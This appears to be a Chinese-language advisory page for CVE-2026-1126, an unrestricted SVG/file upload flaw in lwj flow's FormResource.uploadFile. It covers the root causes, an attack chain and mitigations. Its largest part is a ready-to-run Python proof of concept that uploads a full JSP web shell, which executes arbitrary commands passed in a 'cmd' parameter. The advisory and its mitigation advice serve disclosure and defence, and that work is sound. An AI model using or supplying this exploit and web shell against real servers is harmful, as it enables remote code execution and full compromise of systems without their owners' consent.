CVE-2026-1126 lwj flow FormResource.java SVG文件上传漏洞

漏洞信息

漏洞编号

CVE-2026-1126

漏洞类型

不受限制的文件上传

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

lwj flow

漏洞概述

CVE-2026-1126是lwj flow项目中的一个安全漏洞，存在于flow-front-rest模块的FormResource.java文件中的uploadFile函数。该漏洞允许低权限攻击者通过操纵SVG文件上传功能，上传任意类型的文件到服务器。由于缺乏适当的文件类型验证、内容检查和安全配置，攻击者可利用此漏洞上传恶意文件，进而可能导致远程代码执行、敏感信息泄露或服务器被完全控制。漏洞影响lwj flow up to commit a3d2fe8133db9d3b50fda4f66f68634640344641版本，攻击可远程发起，无需用户交互。

技术细节

该漏洞存在于lwj flow项目的SVG文件处理器中，具体位于flow-master/flow-front-rest/src/main/java/com/dragon/flow/web/resource/flow/FormResource.java文件的uploadFile函数。攻击者通过构造恶意的SVG文件或任意文件类型，利用文件上传功能的上传端点进行攻击。漏洞的根本原因包括：1）未对上传文件的MIME类型进行严格验证；2）未检查文件扩展名与实际内容是否匹配；3）上传目录缺乏适当的访问控制；4）未对SVG等可嵌入脚本的文件内容进行安全过滤。攻击者利用此漏洞可上传包含恶意代码的文件（如WebShell、JSP脚本或可执行文件），然后通过访问上传的文件实现远程代码执行。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统使用lwj flow框架，并定位到存在漏洞的上传端点/api/resource/flow/form/uploadFile

STEP 2

步骤2：构造恶意文件

攻击者构造包含恶意代码的文件（如JSP WebShell、SVG+XSS payload或可执行脚本），绕过客户端的文件类型检查

STEP 3

步骤3：文件上传

通过HTTP POST请求将恶意文件上传到服务器，利用uploadFile函数缺乏的服务器端验证

STEP 4

步骤4：访问上传文件

上传成功后，攻击者通过Web访问路径访问上传的恶意文件

STEP 5

步骤5：执行恶意代码

服务器解析并执行恶意文件中的代码，攻击者获得服务器命令执行权限

STEP 6

步骤6：持久化控制

攻击者可进一步植入后门、窃取数据或横向移动到其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-1126 PoC - Unrestricted File Upload in lwj flow
# Target: lwj flow <= a3d2fe8133db9d3b50fda4f66f68634640344641

def exploit_file_upload(target_url, file_content, filename):
    """
    Exploit the unrestricted file upload vulnerability
    
    Args:
        target_url: URL of the upload endpoint
        file_content: Malicious file content to upload
        filename: Name of the file to upload
    
    Returns:
        Response from the server
    """
    files = {
        'file': (filename, file_content, 'image/svg+xml')
    }
    
    try:
        response = requests.post(target_url, files=files, timeout=10)
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

def main():
    if len(sys.argv) < 3:
        print("Usage: python cve_2026_1126_poc.py <target_url> ")
        print("Example: python cve_2026_1126_poc.py http://target.com/api/resource/flow/form/uploadFile test.jsp")
        sys.exit(1)
    
    target_url = sys.argv[1]
    filename = sys.argv[2]
    
    # Malicious file content - WebShell
    malicious_content = '''<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.*" %>
<%@ page import="java.util.*" %>
<%@ page import="java.text.*" %>
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2026-1126 Exploit</title>
</head>
<body>
<%
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        Process p = Runtime.getRuntime().exec(cmd);
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
            out.println(disr);
            disr = dis.readLine();
        }
    }
%>
</body>
</html>'''
    
    print(f"[*] Exploiting CVE-2026-1126 on {target_url}")
    print(f"[*] Uploading malicious file: {filename}")
    
    response = exploit_file_upload(target_url, malicious_content.encode(), filename)
    
    if response and response.status_code in [200, 201, 204]:
        print(f"[+] File uploaded successfully!")
        print(f"[+] Status code: {response.status_code}")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Upload failed. Status: {response.status_code if response else 'No response'}")

if __name__ == "__main__":
    main()

影响范围

lwj flow <= a3d2fe8133db9d3b50fda4f66f68634640344641

防御指南

临时缓解措施

在正式补丁发布前，可采取以下临时缓解措施：1）禁用或限制文件上传功能；2）在Web应用防火墙(WAF)上配置规则，拦截异常文件上传请求；3）将上传目录移出Web根目录并设置为不可执行；4）使用反向代理限制对上传端点的访问；5）加强日志监控，及时发现异常的上传行为；6）限制上传文件类型，仅允许图片等安全格式。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1126
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1126
3 Details https://www.cvedetails.com/cve/CVE-2026-1126/
4 VulDB https://vuldb.com/cve/CVE-2026-1126
5 Link https://gitee.com/lwj/flow/
6 Link https://gitee.com/lwj/flow/issues/IDIQSE
7 Link https://vuldb.com/?ctiid.341718
8 Link https://vuldb.com/?id.341718
9 Link https://vuldb.com/?submit.735122